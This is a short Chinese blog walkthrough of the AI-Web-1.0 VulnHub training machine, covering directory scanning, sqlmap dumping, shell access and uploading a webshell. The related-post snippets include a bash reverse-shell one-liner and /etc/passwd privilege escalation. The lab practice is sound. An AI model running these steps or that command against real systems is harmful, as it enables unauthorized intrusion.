ai web1.0通关攻略

于 2024-08-19 19:01:46 发布
阅读量218 收藏
点赞数 2
分类专栏: 信息安全 文章标签: ai
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78031880/article/details/141332440
版权

1.通过御剑扫描到网址172.16.1.98

扫描目录找到robot.txt目录

2.浏览器访问看到两个目录

3.查看发现两个目录都不能访问

4.扫描172.16.1.98/m3diNf0/

5.访问info.php

6.扫描另一个目录并且访问

8.--dbs列出数据库

9.--tables列出表名

10.--columns列出字段

11.--dump获取字段中的数据

12.获取shell


13.连接成功

14.上传一句话木马

15.连接蚁剑

谪仙123
关注
专栏目录
AI-Web-1.0靶场
qq_46187131的博客
03-27 1395
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
web前端期末大作业】制作一个HTML+CSS保护动物宠物网页
QQ_____365392777的博客
08-07 327
🐕 宠物网页设计 、🐼保护动物网页、🐋鲸鱼海豚主题、🐘保护大象、等网站的设计与制作。🏷️HTML宠物网页设计,采用DIV+CSS布局,共有多个页面,排版整洁,内容丰富,主题鲜明,首页使用CSS排版比较丰富,色彩鲜明有活力,导航与正文字体分别设置不同字号大小。导航区域设置了背景图。子页面有纯文字页面和图文并茂页面。🏅 一套优质的💯网页设计应该包含 (具体可根据个人要求而定)📔网站布局方面:计划采用目前主流的、能兼容各大主流浏览器、显示效果稳定的浮动网页布局结构。📓网站程序方面:计划采用最新的......
AI-WEB-1.0
底层社会中的弱智
08-03 642
总结: 报错注入常见的十种,本次用的是updatexml 获取os-sh的条件,具有可写权限的绝对路径需要自己拼接 使用openssl passwd -1 salt xxx xxx构造hash 目标主机为192.168.49.158 攻击kali机为192.168.49.129 前期的信息收集,端口服务,目录扫描,web框架等 端口服务: 只开放80端口且存在两个目录 访问web页面,使用nikto和dirb针对主机和目录进行探测: 主页和前端源码没有提供信息 查看下目录
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 4054
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
AI_web_1 ,靶机初体验
weixin_44377940的博客
12-06 376
大佬给了个这个靶机给我玩,我就试着打了一下,学到了很多东西,就记录下来了 首先,用netdiscover先看看主机的ip是啥: 试试第一个 图中可以看到,只开了个80端口,apache的中间件,其中的文件有robots.txt,下面两个目录不允许进入,这应该就是靶机的IP了。 浏览器打开看看: 试试id=1: 估计有注入,祭出神器sqlmap: 但是,好像没有意义,因为这个是sql用户,...
AI:WEB:1 Walkthrough
weixin_30470643的博客
09-26 331
AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法: Nmap网络扫描 浏览网页 爆破目录 SQL注入获取凭证 SQL注入获取shell 可写/etc/passwd 提权 读取falg文件靶机和攻击机处于统一网段下 所以就不用net...
设计一个单选题考试程序python_Python123计算机等级考试二级Python语言与程序设计通关指南七Python 计算生态...
weixin_39826342的博客
10-21 3631
请注意看红色标识文字,图片均是超清图片,可以单击查看看见更大的世界,遇见更好的自己 See a better world to meet better for ourselves.1.MMdnn----MMdnn 是一个深度学习的模型工具集,它能够互转模型文件、可视化模型结构、自动产生训练/推演的代码、辅助测试模型兼容性等。2.Matplotlib----Matplotlib 是一个高质...
⽹络安全学习计划
qq_45541451的博客
07-15 6673
网络安全脚本小子学习计划 如何成为脚本小子第N天,制定的学习计划 网络安全的具体学习计划网络安全脚本小子学习计划第⼀阶段~信息安全基础1、信息安全基础2、nmap安装与使⽤3、burpsuite安装与使⽤⼆、Web基础三、Web安全⼊⻔四、信息收集五、漏洞原理第⼆阶段~基础知识学习⼀、程序设计⼆、⽹络技术三、Linux四、数据库拓展第三阶段~渗透测试实战与⽹络安全⼀、web安全基础与拓展⼆、web安全攻防⼀、环境搭建⼆、WEB安全⼯具基础部分三、常⻅web漏洞解析四、web安全⼯具进阶及拓展五、web安全
软件需求规格说明
qq_60864894的博客
04-26 875
说明 a. 引言 软件需求规格说明文档描述了“智慧海关大脑”1.0版本的功能需求与非功能需求。本文档系统特性说明了海关物流监管系统,智能卡口系统,电子货物追踪系统。本文档计划由开发人员所在的项目团队使用,以及为用户所查看来提供修改意见,指定的所有功能都为高优先级,在此软件版本实现。 a. 1目的 通过智慧海关大脑系统,保障特殊区域场所之间陆路运输监管,对货物和车辆进行严密监控,简化手续。借助科技赋能,提高进出口货物通关效率,优化跨境贸易营商环境。 2预期的读者和阅读建议 开发人员...
栋的月结 | 第一回合(定期更新、动态、架构、云技术、算法、后端、前端、收听/收看、英文、书籍、影视、好歌、新奇)[含泪总结.. 憋泪分享!]
纽雪澳诺加海美德的博客
02-01 2218
开篇词 大家好!以下是我在 2020 年 1 月 1 日至 31 日的所见、所闻、所学和所悟。 现在,我把它们安利给你们。   定期更新 原创专栏: 栋的周评 一文搞定 Linux 管理员手册:既简单又深刻 官方授权: Baeldung Java 周评 符合官方许可: Spring 官方指南   动态 在我的《一文搞定》系列专栏里新增了: 《一文搞定 |...
AI-Web-1 靶场
weixin_46044002的博客
06-23 333
还记的之前出现的phpinfo页面吗?页面中暴露了网站的绝对路径,那我们就可以利用sqlmap拿shell。显示中有一个什么什么uploads,一个文件上传的目录。emmm,我直呼好家伙,这不是相当于还是啥也没有。一样的,环境搭好了,但是啥也没有,先找他的ip。我把靶机环境移除,在重新打开,页面出来了。得到数据,但都不是靶机的登录信息。有个info.php访问看看。
看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web1
热门推荐
Aluxian_的博客
04-26 1万+
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个Web的漏洞靶机,老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/a
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1150
vulnhub ai-web1.0
AI web1靶机知识点
网络安全。
04-12 726
搬砖日常ing… 靶机地址:https://www.vulnhub.com/entry/ai-web-1,353/ 0x01 sqlmap之–os-shell 1、条件 1)需要网站绝对路径(phpinfo或网站报错信息获取)。 2)该路径目录允许写入 2、os-shell 1)一般上传目录都是允许写入的,靶机这里刚好有个upload目录,可成功执行–os-shell。 2)sqlmap --...
AIweb1提权
qq_39742838的博客
12-09 340
1.AIweb1前期端口扫描和sql注入不再提了,教程也有很多,直接说提权。 2.傻傻的上传了一个php文件,想要反弹shell,bash -i >& /dev/tcp/192.168.133.128/4444 0>&1,监听4444端口,访问这个php文件,结果并没有结果,一定是姿势不对。 3.监听4444端口 在kali os-shell执行 py...
AIweb1靶场总结
胖虎的博客
11-03 502
aiweb1靶场总结
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2745
AI-WEB-1.0靶机的简单攻略
AIWEB1综合靶场通关教程,从外网打到内网【附靶场环境】
最新发布
xt350488的博客
08-03 1270
靶场获取后台回下载之后设置为nat模式启动即可,不需要登录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值